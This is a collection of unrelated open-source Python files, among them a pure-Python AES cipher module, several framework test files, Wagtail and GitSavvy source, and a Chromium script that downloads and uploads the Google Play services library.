'uac_execution_level': uac_execution_level,
'additional_manifest_files': additional_manifest_files,
})
test.run_gyp(gypfile, chdir=CHDIR)
if do_build:
test.build(gypfile, chdir=CHDIR)
exe_file = test.built_file_path('test_update_manifest.exe', chdir=CHDIR)
return extract_manifest(exe_file, 1)
manifest = WriteAndUpdate(0, '', True)
test.fail_test('asInvoker' not in manifest)
test.fail_test('35138b9a-5d96-4fbd-8e2d-a2440225f93a' in manifest)
# Make sure that updating .gyp and regenerating doesn't cause a rebuild.
WriteAndUpdate(0, '', False)
test.up_to_date(gypfile, test.ALL, chdir=CHDIR)
# But make sure that changing a manifest property does cause a relink.
manifest = WriteAndUpdate(2, '', True)
test.fail_test('requireAdministrator' not in manifest)
# Adding a manifest causes a rebuild.
manifest = WriteAndUpdate(2, 'extra.manifest', True)
test.fail_test('35138b9a-5d96-4fbd-8e2d-a2440225f93a' not in manifest)
|
cristianveron/HACKERS-ADDONS
|
refs/heads/master
|
pyaes.py
|
189
|
"""Simple AES cipher implementation in pure Python following PEP-272 API
Homepage: https://bitbucket.org/intgr/pyaes/
The goal of this module is to be as fast as reasonable in Python while still
being Pythonic and readable/understandable. It is licensed under the permissive
MIT license.
Hopefully the code is readable and commented enough that it can serve as an
introduction to the AES cipher for Python coders. In fact, it should go along
well with the Stick Figure Guide to AES:
http://www.moserware.com/2009/09/stick-figure-guide-to-advanced.html
Contrary to intuition, this implementation numbers the 4x4 matrices from top to
bottom for efficiency reasons::
0 4 8 12
1 5 9 13
2 6 10 14
3 7 11 15
Effectively it's the transposition of what you'd expect. This actually makes
the code simpler -- except the ShiftRows step, but hopefully the explanation
there clears it up.
"""
####
# Copyright (c) 2010 Marti Raudsepp <marti@juffo.org>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
####
from array import array
# Globals mandated by PEP 272:
# http://www.python.org/dev/peps/pep-0272/
MODE_ECB = 1
MODE_CBC = 2
#MODE_CTR = 6
block_size = 16
key_size = None
def new(key, mode, IV=None):
if mode == MODE_ECB:
return ECBMode(AES(key))
elif mode == MODE_CBC:
if IV is None:
raise ValueError, "CBC mode needs an IV value!"
return CBCMode(AES(key), IV)
else:
raise NotImplementedError
#### AES cipher implementation
class AES(object):
block_size = 16
def __init__(self, key):
self.setkey(key)
def setkey(self, key):
"""Sets the key and performs key expansion."""
self.key = key
self.key_size = len(key)
if self.key_size == 16:
self.rounds = 10
elif self.key_size == 24:
self.rounds = 12
elif self.key_size == 32:
self.rounds = 14
else:
raise ValueError, "Key length must be 16, 24 or 32 bytes"
self.expand_key()
def expand_key(self):
"""Performs AES key expansion on self.key and stores in self.exkey"""
# The key schedule specifies how parts of the key are fed into the
# cipher's round functions. "Key expansion" means performing this
# schedule in advance. Almost all implementations do this.
#
# Here's a description of AES key schedule:
# http://en.wikipedia.org/wiki/Rijndael_key_schedule
# The expanded key starts with the actual key itself
exkey = array('B', self.key)
# extra key expansion steps
if self.key_size == 16:
extra_cnt = 0
elif self.key_size == 24:
extra_cnt = 2
else:
extra_cnt = 3
# 4-byte temporary variable for key expansion
word = exkey[-4:]
# Each expansion cycle uses 'i' once for Rcon table lookup
for i in xrange(1, 11):
#### key schedule core:
# left-rotate by 1 byte
word = word[1:4] + word[0:1]
# apply S-box to all bytes
for j in xrange(4):
word[j] = aes_sbox[word[j]]
# apply the Rcon table to the leftmost byte
word[0] = word[0] ^ aes_Rcon[i]
#### end key schedule core
for z in xrange(4):
for j in xrange(4):
# mix in bytes from the last subkey
word[j] ^= exkey[-self.key_size + j]
exkey.extend(word)
# Last key expansion cycle always finishes here
if len(exkey) >= (self.rounds+1) * self.block_size:
break
# Special substitution step for 256-bit key
if self.key_size == 32:
for j in xrange(4):
# mix in bytes from the last subkey XORed with S-box of
# current word bytes
word[j] = aes_sbox[word[j]] ^ exkey[-self.key_size + j]
exkey.extend(word)
# Twice for 192-bit key, thrice for 256-bit key
for z in xrange(extra_cnt):
for j in xrange(4):
# mix in bytes from the last subkey
word[j] ^= exkey[-self.key_size + j]
exkey.extend(word)
self.exkey = exkey
def add_round_key(self, block, round):
"""AddRoundKey step in AES. This is where the key is mixed into plaintext"""
offset = round * 16
exkey = self.exkey
for i in xrange(16):
block[i] ^= exkey[offset + i]
#print 'AddRoundKey:', block
def sub_bytes(self, block, sbox):
"""SubBytes step, apply S-box to all bytes
Depending on whether encrypting or decrypting, a different sbox array
is passed in.
"""
for i in xrange(16):
block[i] = sbox[block[i]]
#print 'SubBytes :', block
def shift_rows(self, b):
"""ShiftRows step. Shifts 2nd row to left by 1, 3rd row by 2, 4th row by 3
Since we're performing this on a transposed matrix, cells are numbered
from top to bottom::
0 4 8 12 -> 0 4 8 12 -- 1st row doesn't change
1 5 9 13 -> 5 9 13 1 -- row shifted to left by 1 (wraps around)
2 6 10 14 -> 10 14 2 6 -- shifted by 2
3 7 11 15 -> 15 3 7 11 -- shifted by 3
"""
b[1], b[5], b[ 9], b[13] = b[ 5], b[ 9], b[13], b[ 1]
b[2], b[6], b[10], b[14] = b[10], b[14], b[ 2], b[ 6]
b[3], b[7], b[11], b[15] = b[15], b[ 3], b[ 7], b[11]
#print 'ShiftRows :', b
def shift_rows_inv(self, b):
"""Similar to shift_rows above, but performed in inverse for decryption."""
b[ 5], b[ 9], b[13], b[ 1] = b[1], b[5], b[ 9], b[13]
b[10], b[14], b[ 2], b[ 6] = b[2], b[6], b[10], b[14]
b[15], b[ 3], b[ 7], b[11] = b[3], b[7], b[11], b[15]
#print 'ShiftRows :', b
def mix_columns(self, block):
"""MixColumns step. Mixes the values in each column"""
# Cache global multiplication tables (see below)
mul_by_2 = gf_mul_by_2
mul_by_3 = gf_mul_by_3
# Since we're dealing with a transposed matrix, columns are already
# sequential
for i in xrange(4):
col = i * 4
#v0, v1, v2, v3 = block[col : col+4]
v0, v1, v2, v3 = (block[col], block[col + 1], block[col + 2],
block[col + 3])
block[col ] = mul_by_2[v0] ^ v3 ^ v2 ^ mul_by_3[v1]
block[col+1] = mul_by_2[v1] ^ v0 ^ v3 ^ mul_by_3[v2]
block[col+2] = mul_by_2[v2] ^ v1 ^ v0 ^ mul_by_3[v3]
block[col+3] = mul_by_2[v3] ^ v2 ^ v1 ^ mul_by_3[v0]
#print 'MixColumns :', block
def mix_columns_inv(self, block):
"""Similar to mix_columns above, but performed in inverse for decryption."""
# Cache global multiplication tables (see below)
mul_9 = gf_mul_by_9
mul_11 = gf_mul_by_11
mul_13 = gf_mul_by_13
mul_14 = gf_mul_by_14
# Since we're dealing with a transposed matrix, columns are already
# sequential
for i in xrange(4):
col = i * 4
v0, v1, v2, v3 = (block[col], block[col + 1], block[col + 2],
block[col + 3])
#v0, v1, v2, v3 = block[col:col+4]
block[col ] = mul_14[v0] ^ mul_9[v3] ^ mul_13[v2] ^ mul_11[v1]
block[col+1] = mul_14[v1] ^ mul_9[v0] ^ mul_13[v3] ^ mul_11[v2]
block[col+2] = mul_14[v2] ^ mul_9[v1] ^ mul_13[v0] ^ mul_11[v3]
block[col+3] = mul_14[v3] ^ mul_9[v2] ^ mul_13[v1] ^ mul_11[v0]
#print 'MixColumns :', block
def encrypt_block(self, block):
"""Encrypts a single block. This is the main AES function"""
# For efficiency reasons, the state between steps is transmitted via a
# mutable array, not returned.
self.add_round_key(block, 0)
for round in xrange(1, self.rounds):
self.sub_bytes(block, aes_sbox)
self.shift_rows(block)
self.mix_columns(block)
self.add_round_key(block, round)
self.sub_bytes(block, aes_sbox)
self.shift_rows(block)
# no mix_columns step in the last round
self.add_round_key(block, self.rounds)
def decrypt_block(self, block):
"""Decrypts a single block. This is the main AES decryption function"""
# For efficiency reasons, the state between steps is transmitted via a
# mutable array, not returned.
self.add_round_key(block, self.rounds)
# count rounds down from self.rounds-1 ... 1
for round in xrange(self.rounds-1, 0, -1):
self.shift_rows_inv(block)
self.sub_bytes(block, aes_inv_sbox)
self.add_round_key(block, round)
self.mix_columns_inv(block)
self.shift_rows_inv(block)
self.sub_bytes(block, aes_inv_sbox)
self.add_round_key(block, 0)
# no mix_columns step in the last round
#### ECB mode implementation
class ECBMode(object):
"""Electronic CodeBook (ECB) mode encryption.
Basically this mode applies the cipher function to each block individually;
no feedback is done. NB! This is insecure for almost all purposes
"""
def __init__(self, cipher):
self.cipher = cipher
self.block_size = cipher.block_size
def ecb(self, data, block_func):
"""Perform ECB mode with the given function"""
if len(data) % self.block_size != 0:
raise ValueError, "Plaintext length must be multiple of 16"
block_size = self.block_size
data = array('B', data)
for offset in xrange(0, len(data), block_size):
block = data[offset : offset+block_size]
block_func(block)
data[offset : offset+block_size] = block
return data.tostring()
def encrypt(self, data):
"""Encrypt data in ECB mode"""
return self.ecb(data, self.cipher.encrypt_block)
def decrypt(self, data):
"""Decrypt data in ECB mode"""
return self.ecb(data, self.cipher.decrypt_block)
#### CBC mode
class CBCMode(object):
"""Cipher Block Chaining (CBC) mode encryption. This mode avoids content leaks.
In CBC encryption, each plaintext block is XORed with the ciphertext block
preceding it; decryption is simply the inverse.
"""
# A better explanation of CBC can be found here:
# http://en.wikipedia.org/wiki/Block_cipher_modes_of_operation#Cipher-block_chaining_.28CBC.29
def __init__(self, cipher, IV):
self.cipher = cipher
self.block_size = cipher.block_size
self.IV = array('B', IV)
def encrypt(self, data):
"""Encrypt data in CBC mode"""
block_size = self.block_size
if len(data) % block_size != 0:
raise ValueError, "Plaintext length must be multiple of 16"
data = array('B', data)
IV = self.IV
for offset in xrange(0, len(data), block_size):
block = data[offset : offset+block_size]
# Perform CBC chaining
for i in xrange(block_size):
block[i] ^= IV[i]
self.cipher.encrypt_block(block)
data[offset : offset+block_size] = block
IV = block
self.IV = IV
return data.tostring()
def decrypt(self, data):
"""Decrypt data in CBC mode"""
block_size = self.block_size
if len(data) % block_size != 0:
raise ValueError, "Ciphertext length must be multiple of 16"
data = array('B', data)
IV = self.IV
for offset in xrange(0, len(data), block_size):
ctext = data[offset : offset+block_size]
block = ctext[:]
self.cipher.decrypt_block(block)
# Perform CBC chaining
#for i in xrange(block_size):
# data[offset + i] ^= IV[i]
for i in xrange(block_size):
block[i] ^= IV[i]
data[offset : offset+block_size] = block
IV = ctext
#data[offset : offset+block_size] = block
self.IV = IV
return data.tostring()
####
def galois_multiply(a, b):
"""Galois Field multiplicaiton for AES"""
p = 0
while b:
if b & 1:
p ^= a
a <<= 1
if a & 0x100:
a ^= 0x1b
b >>= 1
return p & 0xff
# Precompute the multiplication tables for encryption
gf_mul_by_2 = array('B', [galois_multiply(x, 2) for x in range(256)])
gf_mul_by_3 = array('B', [galois_multiply(x, 3) for x in range(256)])
# ... for decryption
gf_mul_by_9 = array('B', [galois_multiply(x, 9) for x in range(256)])
gf_mul_by_11 = array('B', [galois_multiply(x, 11) for x in range(256)])
gf_mul_by_13 = array('B', [galois_multiply(x, 13) for x in range(256)])
gf_mul_by_14 = array('B', [galois_multiply(x, 14) for x in range(256)])
####
# The S-box is a 256-element array that maps a single byte value to another
# byte value. Since it's designed to be reversible, each value occurs only once
# in the S-box
#
# More information: http://en.wikipedia.org/wiki/Rijndael_S-box
aes_sbox = array('B',
'637c777bf26b6fc53001672bfed7ab76'
'ca82c97dfa5947f0add4a2af9ca472c0'
'b7fd9326363ff7cc34a5e5f171d83115'
'04c723c31896059a071280e2eb27b275'
'09832c1a1b6e5aa0523bd6b329e32f84'
'53d100ed20fcb15b6acbbe394a4c58cf'
'd0efaafb434d338545f9027f503c9fa8'
'51a3408f929d38f5bcb6da2110fff3d2'
'cd0c13ec5f974417c4a77e3d645d1973'
'60814fdc222a908846eeb814de5e0bdb'
'e0323a0a4906245cc2d3ac629195e479'
'e7c8376d8dd54ea96c56f4ea657aae08'
'ba78252e1ca6b4c6e8dd741f4bbd8b8a'
'703eb5664803f60e613557b986c11d9e'
'e1f8981169d98e949b1e87e9ce5528df'
'8ca1890dbfe6426841992d0fb054bb16'.decode('hex')
)
# This is the inverse of the above. In other words:
# aes_inv_sbox[aes_sbox[val]] == val
aes_inv_sbox = array('B',
'52096ad53036a538bf40a39e81f3d7fb'
'7ce339829b2fff87348e4344c4dee9cb'
'547b9432a6c2233dee4c950b42fac34e'
'082ea16628d924b2765ba2496d8bd125'
'72f8f66486689816d4a45ccc5d65b692'
'6c704850fdedb9da5e154657a78d9d84'
'90d8ab008cbcd30af7e45805b8b34506'
'd02c1e8fca3f0f02c1afbd0301138a6b'
'3a9111414f67dcea97f2cfcef0b4e673'
'96ac7422e7ad3585e2f937e81c75df6e'
'47f11a711d29c5896fb7620eaa18be1b'
'fc563e4bc6d279209adbc0fe78cd5af4'
'1fdda8338807c731b11210592780ec5f'
'60517fa919b54a0d2de57a9f93c99cef'
'a0e03b4dae2af5b0c8ebbb3c83539961'
'172b047eba77d626e169146355210c7d'.decode('hex')
)
# The Rcon table is used in AES's key schedule (key expansion)
# It's a pre-computed table of exponentiation of 2 in AES's finite field
#
# More information: http://en.wikipedia.org/wiki/Rijndael_key_schedule
aes_Rcon = array('B',
'8d01020408102040801b366cd8ab4d9a'
'2f5ebc63c697356ad4b37dfaefc59139'
'72e4d3bd61c29f254a943366cc831d3a'
'74e8cb8d01020408102040801b366cd8'
'ab4d9a2f5ebc63c697356ad4b37dfaef'
'c5913972e4d3bd61c29f254a943366cc'
'831d3a74e8cb8d01020408102040801b'
'366cd8ab4d9a2f5ebc63c697356ad4b3'
'7dfaefc5913972e4d3bd61c29f254a94'
'3366cc831d3a74e8cb8d010204081020'
'40801b366cd8ab4d9a2f5ebc63c69735'
'6ad4b37dfaefc5913972e4d3bd61c29f'
'254a943366cc831d3a74e8cb8d010204'
'08102040801b366cd8ab4d9a2f5ebc63'
'c697356ad4b37dfaefc5913972e4d3bd'
'61c29f254a943366cc831d3a74e8cb'.decode('hex')
)
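# --- Editor's illustrative sketch (not part of the original module) ---
# Exercises the PEP-272 style API defined above. The key and IV are arbitrary
# 16-byte example strings; plaintext length must be a multiple of the 16-byte
# block size.
if __name__ == '__main__':
    demo_key = '0123456789abcdef'        # 16-byte key selects AES-128
    demo_iv = 'fedcba9876543210'         # CBC mode requires a 16-byte IV
    demo_plaintext = 'sixteen byte msg'  # exactly one block
    demo_ciphertext = new(demo_key, MODE_CBC, IV=demo_iv).encrypt(demo_plaintext)
    # A fresh cipher object is used for decryption because CBC mutates its IV state.
    assert new(demo_key, MODE_CBC, IV=demo_iv).decrypt(demo_ciphertext) == demo_plaintext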
|
rodorad/spark-tk
|
refs/heads/master
|
integration-tests/tests/test_random_forest_classifier.py
|
3
|
# vim: set encoding=utf-8
# Copyright (c) 2016 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from setup import tc, rm, get_sandbox_path
import logging
logger = logging.getLogger(__name__)
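# The test below builds a small two-feature, binary-label frame, trains a
# random forest classifier on it, and checks that predicting and testing on
# the same (training) frame yields perfect classification metrics.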
def test_random_forest_classifier(tc):
logger.info("define schema")
schema = [("Class", int),("Dim_1", float),("Dim_2", float)]
logger.info("creating the frame")
data = [[1,19.8446136104,2.2985856384],
[1,16.8973559126,2.6933495054],
[1,5.5548729596,2.7777687995],
[0,46.1810010826,3.1611961917],
[0,44.3117586448,3.3458963222],
[0,34.6334526911,3.6429838715],
[1,11.4849647497,3.8530199663],
[0,43.7438430327,3.9347590844],
[0,44.961185029,4.0953872464],
[0,37.0549734365,4.1039157849],
[0,52.0093009461,4.1455433148],
[0,38.6092023162,4.1615595686],
[0,33.8789730794,4.1970765922],
[1,-1.0388754777,4.4190319518],
[0,49.913080358,4.5445142439],
[1,3.2789270744,4.8419490458],
[1,9.7921007601,4.8870605498],
[0,45.5778621825,4.9665753213],
[0,45.4773893261,5.0764210643],
[0,44.303211041,5.1112029237],
[0,52.8429742116,5.4121654741],
[1,14.8057269164,5.5634291719],
[0,42.6043814342,5.5988383751],
[1,13.7291123825,5.6684973484],
[0,50.7410573499,5.6901229975],
[0,52.0093990181,5.7401924186]]
f = tc.frame.create(data, schema=schema)
logger.info(f.inspect())
logger.info("training the model on the frame")
model = tc.models.classification.random_forest_classifier.train(f, 'Class', ['Dim_1', 'Dim_2'], num_classes=2)
logger.info("predicting the class using the model and the frame")
predict_frame = model.predict(f)
assert(set(predict_frame.column_names) == set(['Class', 'Dim_1', 'Dim_2','predicted_class']))
assert(len(predict_frame.column_names) == 4)
metrics = model.test(f)
assert(metrics.accuracy == 1.0)
assert(metrics.f_measure == 1.0)
assert(metrics.precision == 1.0)
assert(metrics.recall == 1.0)
|
MiltosD/CEFELRC
|
refs/heads/master
|
lib/python2.7/site-packages/django/contrib/messages/models.py
|
634
|
# Models module required so tests are discovered.
|
100Shapes/wagtail
|
refs/heads/master
|
wagtail/contrib/wagtailstyleguide/views.py
|
5
|
from django import forms
from django.shortcuts import render
from django.utils.translation import ugettext as _
from django.contrib import messages
from django.contrib.auth.decorators import permission_required
from wagtail.wagtailadmin.forms import SearchForm
CHOICES = (
('choice1', 'choice 1'),
('choice2', 'choice 2'),
)
class ExampleForm(forms.Form):
text = forms.CharField(required=True, help_text="help text")
url = forms.URLField(required=True)
email = forms.EmailField(max_length=254)
date = forms.DateField()
time = forms.TimeField()
select = forms.ChoiceField(choices=CHOICES)
boolean = forms.BooleanField(required=False)
@permission_required('wagtailadmin.access_admin')
def index(request):
form = SearchForm(placeholder=_("Search something"))
example_form = ExampleForm()
messages.success(request, _("Success message"))
messages.warning(request, _("Warning message"))
messages.error(request, _("Error message"))
fake_pagination = {
'number': 1,
'previous_page_number': 1,
'next_page_number': 2,
'has_previous': True,
'has_next': True,
'paginator': {
'num_pages': 10,
},
}
return render(request, 'wagtailstyleguide/base.html', {
'search_form': form,
'example_form': example_form,
'fake_pagination': fake_pagination,
})
|
anhstudios/swganh
|
refs/heads/develop
|
data/scripts/templates/object/draft_schematic/structure/shared_installation_mining_organic_creature.py
|
2
|
#### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Intangible()
result.template = "object/draft_schematic/structure/shared_installation_mining_organic_creature.iff"
result.attribute_template_id = -1
result.stfName("string_id_table","")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result
|
dreki/GitSavvy
|
refs/heads/master
|
git_savvy.py
|
4
|
import sys
import sublime
if sys.version_info[0] == 2:
raise ImportWarning("GitSavvy does not support Sublime Text 2.")
else:
def plugin_loaded():
from .common import util
util.file.determine_syntax_files()
# Ensure all interfaces are ready.
sublime.set_timeout_async(
lambda: util.view.refresh_gitsavvy(sublime.active_window().active_view()))
from .common.commands import *
from .common.ui import *
from .common.global_events import *
from .core.commands import *
from .core.interfaces import *
from .github.commands import *
|
lucidmotifs/auto-aoc
|
refs/heads/master
|
.venv/lib/python3.5/site-packages/pylint/test/functional/bad_indentation.py
|
12
|
# pylint: disable=missing-docstring, pointless-statement
from __future__ import print_function
def totoo():
print('malindented') # [bad-indentation]
def tutuu():
print('good indentation')
def titii():
1 # and this. # [bad-indentation]
def tataa(kdict):
for key in ['1', '2', '3']:
key = key.lower()
if key in kdict:
del kdict[key]
|
chrisdickinson/nojs
|
refs/heads/master
|
build/android/play_services/update.py
|
1
|
#!/usr/bin/env python
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
'''
Script to help uploading and downloading the Google Play services library to
and from Google Cloud Storage.
'''
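# Editor's note: typical invocations (the sub-commands and flags are defined
# below in main(), AddBasicArguments() and AddBucketArguments()):
#   update.py download --sdk-root third_party/android_tools/sdk
#   update.py sdk
#   update.py upload --bucket chromium-android-tools/play-services --dry-run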
import argparse
import logging
import os
import re
import shutil
import sys
import tempfile
import zipfile
sys.path.append(os.path.join(os.path.dirname(__file__), os.pardir))
import devil_chromium
from devil.utils import cmd_helper
from play_services import utils
from pylib import constants
from pylib.constants import host_paths
from pylib.utils import logging_utils
sys.path.append(os.path.join(host_paths.DIR_SOURCE_ROOT, 'build'))
import find_depot_tools # pylint: disable=import-error,unused-import
import breakpad
import download_from_google_storage
import upload_to_google_storage
# Directory where the SHA1 files for the zip and the license are stored
# It should be managed by git to provide information about new versions.
SHA1_DIRECTORY = os.path.join(host_paths.DIR_SOURCE_ROOT, 'build', 'android',
'play_services')
# Default bucket used for storing the files.
GMS_CLOUD_STORAGE = 'chromium-android-tools/play-services'
# Path to the default configuration file. It exposes the currently installed
# version of the library in a human readable way.
CONFIG_DEFAULT_PATH = os.path.join(host_paths.DIR_SOURCE_ROOT, 'build',
'android', 'play_services', 'config.json')
LICENSE_FILE_NAME = 'LICENSE'
ZIP_FILE_NAME = 'google_play_services_library.zip'
GMS_PACKAGE_ID = 'extras;google;m2repository' # used by sdk manager
LICENSE_PATTERN = re.compile(r'^Pkg\.License=(?P<text>.*)$', re.MULTILINE)
def main(raw_args):
parser = argparse.ArgumentParser(
description=__doc__ + 'Please see the subcommand help for more details.',
formatter_class=utils.DefaultsRawHelpFormatter)
subparsers = parser.add_subparsers(title='commands')
# Download arguments
parser_download = subparsers.add_parser(
'download',
help='download the library from the cloud storage',
description=Download.__doc__,
formatter_class=utils.DefaultsRawHelpFormatter)
parser_download.set_defaults(func=Download)
AddBasicArguments(parser_download)
AddBucketArguments(parser_download)
# SDK Update arguments
parser_sdk = subparsers.add_parser(
'sdk',
help='get the latest Google Play services SDK using Android SDK Manager',
description=UpdateSdk.__doc__,
formatter_class=utils.DefaultsRawHelpFormatter)
parser_sdk.set_defaults(func=UpdateSdk)
AddBasicArguments(parser_sdk)
# Upload arguments
parser_upload = subparsers.add_parser(
'upload',
help='upload the library to the cloud storage',
description=Upload.__doc__,
formatter_class=utils.DefaultsRawHelpFormatter)
parser_upload.set_defaults(func=Upload)
AddBasicArguments(parser_upload)
AddBucketArguments(parser_upload)
args = parser.parse_args(raw_args)
if args.verbose:
logging.basicConfig(level=logging.DEBUG)
logging_utils.ColorStreamHandler.MakeDefault(not _IsBotEnvironment())
devil_chromium.Initialize()
return args.func(args)
def AddBasicArguments(parser):
'''
Defines the common arguments on the subparser rather than the main one. This
allows putting arguments after the command: `foo.py upload --debug --force`
instead of `foo.py --debug upload --force`
'''
parser.add_argument('--sdk-root',
help='base path to the Android SDK tools root',
default=constants.ANDROID_SDK_ROOT)
parser.add_argument('-v', '--verbose',
action='store_true',
help='print debug information')
def AddBucketArguments(parser):
parser.add_argument('--bucket',
help='name of the bucket where the files are stored',
default=GMS_CLOUD_STORAGE)
parser.add_argument('--config',
help='JSON Configuration file',
default=CONFIG_DEFAULT_PATH)
parser.add_argument('--dry-run',
action='store_true',
help=('run the script in dry run mode. Files will be '
'copied to a local directory instead of the '
'cloud storage. The bucket name will be used as the '
'path to that directory, relative to the repository '
'root.'))
parser.add_argument('-f', '--force',
action='store_true',
help='run even if the library is already up to date')
def Download(args):
'''
Downloads the Google Play services library from a Google Cloud Storage bucket
and installs it to
//third_party/android_tools/sdk/extras/google/m2repository.
A license check will be made, and the user might have to accept the license
if that has not been done before.
'''
if not os.path.isdir(args.sdk_root):
logging.debug('Did not find the Android SDK root directory at "%s".',
args.sdk_root)
if not args.force:
logging.info('Skipping, not on an android checkout.')
return 0
config = utils.ConfigParser(args.config)
paths = PlayServicesPaths(args.sdk_root, config.version_number,
config.clients)
if os.path.isdir(paths.package) and not os.access(paths.package, os.W_OK):
logging.error('Failed updating the Google Play Services library. '
'The location is not writable. Please remove the '
'directory (%s) and try again.', paths.package)
return -2
new_lib_zip_sha1 = os.path.join(SHA1_DIRECTORY, ZIP_FILE_NAME + '.sha1')
logging.debug('Comparing zip hashes: %s and %s', new_lib_zip_sha1,
paths.lib_zip_sha1)
if utils.FileEquals(new_lib_zip_sha1, paths.lib_zip_sha1) and not args.force:
logging.info('Skipping, the Google Play services library is up to date.')
return 0
bucket_path = _VerifyBucketPathFormat(args.bucket,
config.version_number,
args.dry_run)
tmp_root = tempfile.mkdtemp()
try:
# setup the destination directory
if not os.path.isdir(paths.package):
os.makedirs(paths.package)
# download license file from bucket/{version_number}/license.sha1
new_license = os.path.join(tmp_root, LICENSE_FILE_NAME)
license_sha1 = os.path.join(SHA1_DIRECTORY, LICENSE_FILE_NAME + '.sha1')
_DownloadFromBucket(bucket_path, license_sha1, new_license,
args.verbose, args.dry_run)
if (not _IsBotEnvironment() and
not _CheckLicenseAgreement(new_license, paths.license,
config.version_number)):
logging.warning('Your version of the Google Play services library is '
'not up to date. You might run into issues building '
'or running the app. Please run `%s download` to '
'retry downloading it.', __file__)
return 0
new_lib_zip = os.path.join(tmp_root, ZIP_FILE_NAME)
_DownloadFromBucket(bucket_path, new_lib_zip_sha1, new_lib_zip,
args.verbose, args.dry_run)
try:
# Remove the deprecated sdk directory.
deprecated_package_path = os.path.join(args.sdk_root, 'extras', 'google',
'google_play_services')
if os.path.exists(deprecated_package_path):
shutil.rmtree(deprecated_package_path)
# We remove the current version of the Google Play services SDK.
if os.path.exists(paths.package):
shutil.rmtree(paths.package)
os.makedirs(paths.package)
logging.debug('Extracting the library to %s', paths.package)
with zipfile.ZipFile(new_lib_zip, "r") as new_lib_zip_file:
new_lib_zip_file.extractall(paths.package)
logging.debug('Copying %s to %s', new_license, paths.license)
shutil.copy(new_license, paths.license)
logging.debug('Copying %s to %s', new_lib_zip_sha1, paths.lib_zip_sha1)
shutil.copy(new_lib_zip_sha1, paths.lib_zip_sha1)
logging.info('Update complete.')
except Exception as e: # pylint: disable=broad-except
logging.error('Failed updating the Google Play Services library. '
'An error occurred while installing the new version in '
'the SDK directory: %s ', e)
return -3
finally:
shutil.rmtree(tmp_root)
return 0
def UpdateSdk(args):
'''
Uses the Android SDK Manager to download the latest Google Play services SDK
locally. Its usual installation path is
//third_party/android_tools/sdk/extras/google/m2repository
'''
# This function should not run on bots and could fail for many user- and
# setup-related reasons. Also, exceptions here are not caught, so we
# disable breakpad to avoid spamming the logs.
breakpad.IS_ENABLED = False
# `android update sdk` fails if the library is not installed yet, but it does
# not allow installing it from scratch using the command line. We therefore
# create a fake outdated installation.
paths = PlayServicesPaths(args.sdk_root, 'no_version_number', [])
if not os.path.isfile(paths.source_prop):
if not os.path.exists(os.path.dirname(paths.source_prop)):
os.makedirs(os.path.dirname(paths.source_prop))
with open(paths.source_prop, 'w') as prop_file:
prop_file.write('Pkg.Revision=0.0.0\n')
sdk_manager = os.path.join(args.sdk_root, 'tools', 'bin', 'sdkmanager')
cmd_helper.Call([sdk_manager, GMS_PACKAGE_ID])
# If no update is needed, it still returns successfully so we just do nothing
return 0
def Upload(args):
'''
Uploads the library from the local Google Play services SDK to a Google Cloud
storage bucket. The version of the library and the list of clients to be
uploaded will be taken from the configuration file. (see --config parameter)
By default, a local commit will be made at the end of the operation.
'''
# This function should not run on bots and could fail for many user- and
# setup-related reasons. Also, exceptions here are not caught, so we
# disable breakpad to avoid spamming the logs.
breakpad.IS_ENABLED = False
config = utils.ConfigParser(args.config)
paths = PlayServicesPaths(args.sdk_root, config.version_number,
config.clients)
logging.debug('-- Loaded paths --\n%s\n------------------', paths)
tmp_root = tempfile.mkdtemp()
try:
new_lib_zip = os.path.join(tmp_root, ZIP_FILE_NAME)
new_license = os.path.join(tmp_root, LICENSE_FILE_NAME)
_ZipLibrary(new_lib_zip, paths.client_paths, paths.package)
_ExtractLicenseFile(new_license, paths.source_prop)
bucket_path = _VerifyBucketPathFormat(args.bucket, config.version_number,
args.dry_run)
files_to_upload = [new_lib_zip, new_license]
logging.debug('Uploading %s to %s', files_to_upload, bucket_path)
_UploadToBucket(bucket_path, files_to_upload, args.dry_run)
new_lib_zip_sha1 = os.path.join(SHA1_DIRECTORY,
ZIP_FILE_NAME + '.sha1')
new_license_sha1 = os.path.join(SHA1_DIRECTORY,
LICENSE_FILE_NAME + '.sha1')
shutil.copy(new_lib_zip + '.sha1', new_lib_zip_sha1)
shutil.copy(new_license + '.sha1', new_license_sha1)
finally:
shutil.rmtree(tmp_root)
logging.info('Update to version %s complete', config.version_number)
return 0
def _DownloadFromBucket(bucket_path, sha1_file, destination, verbose,
is_dry_run):
'''Downloads the file designated by the provided sha1 from a cloud bucket.'''
download_from_google_storage.download_from_google_storage(
input_filename=sha1_file,
base_url=bucket_path,
gsutil=_InitGsutil(is_dry_run),
num_threads=1,
directory=None,
recursive=False,
force=False,
output=destination,
ignore_errors=False,
sha1_file=sha1_file,
verbose=verbose,
auto_platform=True,
extract=False)
